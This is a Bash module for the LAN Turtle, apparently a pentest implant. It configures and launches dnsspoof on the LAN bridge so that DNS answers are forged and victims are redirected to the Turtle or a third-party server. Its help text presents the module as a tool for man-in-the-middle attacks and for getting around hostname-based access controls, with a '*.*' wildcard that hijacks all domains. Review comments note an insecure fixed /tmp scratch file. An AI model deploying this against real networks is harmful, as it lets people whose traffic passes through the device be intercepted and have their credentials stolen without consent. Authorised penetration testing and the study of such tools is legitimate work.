lanturtle-modules/modules/dns-spoof


#!/bin/bash /usr/lib/turtle/turtle_module
# Module metadata.
# NOTE(review): presumably read by the turtle_module loader named in the
# shebang; confirm against that loader.
VERSION='1.0'
DESCRIPTION="dnsspoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks."

# Scratch file that receives the text edited in the dialog editbox.
# NOTE(review): this is a fixed, predictable name under /tmp. configure
# redirects into it, so a pre-existing symlink at this path would be followed.
# A mktemp-created file would avoid that.
CONF="/tmp/dnsspoof.form"

# dialog(1) exit statuses. The ${NAME=value} form assigns only when the
# variable is unset, so values already exported by the caller are kept.
: "${DIALOG_OK=0}"
: "${DIALOG_CANCEL=1}"
: "${DIALOG_HELP=2}"
: "${DIALOG_EXTRA=3}"
: "${DIALOG_ITEM_HELP=4}"
: "${DIALOG_ESC=255}"
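#######################################
# Edit the spoof host list in a dialog editbox and save the result.
# Globals:   CONF (read) - scratch file that receives the edited text
#            DIALOG_OK, DIALOG_HELP, DIALOG_CANCEL, DIALOG_ESC (read)
# Arguments: none
# Outputs:   draws dialog screens; rewrites /etc/turtle/spoofhost on OK
# Returns:   status of the last command run in the selected branch
#######################################
function configure {
  local spoofhost=/etc/turtle/spoofhost
  local status

  # Seed the list with the default example entry on first use.
  if [ ! -e "$spoofhost" ]; then
    printf '%s\n' "172.16.84.1 example.com" > "$spoofhost"
  fi

  # dialog writes the edited buffer to stderr, which is captured in $CONF.
  # The space before the trailing backslash matters: without it the width
  # and the redirection join into the single word "722>...".
  # NOTE(review): $CONF is a fixed name under /tmp and the redirection
  # follows symlinks; creating the scratch file with mktemp would avoid that.
  dialog \
    --help-button \
    --title "DNSSpoof Configuration (/etc/turtle/spoofhost)" \
    --editbox "$spoofhost" 18 72 \
    2>"$CONF"
  status=$?

  case $status in
    "$DIALOG_OK")
      # Persist the edited text, then drop the scratch copy.
      cat "$CONF" > "$spoofhost"
      rm -f "$CONF"
      ;;
    "$DIALOG_HELP")
      dialog --title "Help" \
        --msgbox "\
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks.\n\n\
For example, the IP address returned for a client lookup of the domain \"example.com\" can be replaced with that of the LAN Turtle itself, or a 3rd party server.\n\n\
In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.\n\n\
The Spoofhost editor lists the IP address and Domain names to spoof. The default example replaces example.com with the IP address 172.16.84.1 - the LAN Turtle default address.\n\n\
Wildcards may be used in domain names. For example, \"172.16.84.1 example.*\" would spoof all top-level domains for example, such as .com, .net, .org, etc.\n\n\
The wildcard *.* will replace all domains.\
" 20 72
      # Return to the editor once the help box is dismissed.
      configure
      ;;
    "$DIALOG_CANCEL" | "$DIALOG_ESC")
      rm -f "$CONF"
      ;;
    *)
      # Any other dialog status: do not leave the scratch file behind.
      rm -f "$CONF"
      ;;
  esac
}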
#######################################
# Queue dnsspoof on br-lan through at(1) instead of running it in this shell.
# The queued command discards stdout and sends stderr to /tmp/dnsspoof.log.
# NOTE(review): the log path is a fixed name under /tmp, like $CONF.
# Returns: status of the at(1) invocation
#######################################
function start {
  local job='dnsspoof -i br-lan -f /etc/turtle/spoofhost > /dev/null 2>/tmp/dnsspoof.log'
  printf '%s\n' "$job" | at now
}
#######################################
# Print the PIDs of running dnsspoof processes, then kill them all by name.
# Outputs: a header line followed by whatever pidof prints
# Returns: status of killall
#######################################
function stop {
  printf '%s\n' "Killing DNSSpoof with pid:"
  pidof dnsspoof
  killall dnsspoof
}
#######################################
# Report whether dnsspoof is running.
# Outputs: "1" when pgrep finds a matching process, otherwise "0"
#######################################
function status {
  local running=0
  if pgrep dnsspoof > /dev/null; then
    running=1
  fi
  echo "$running"
}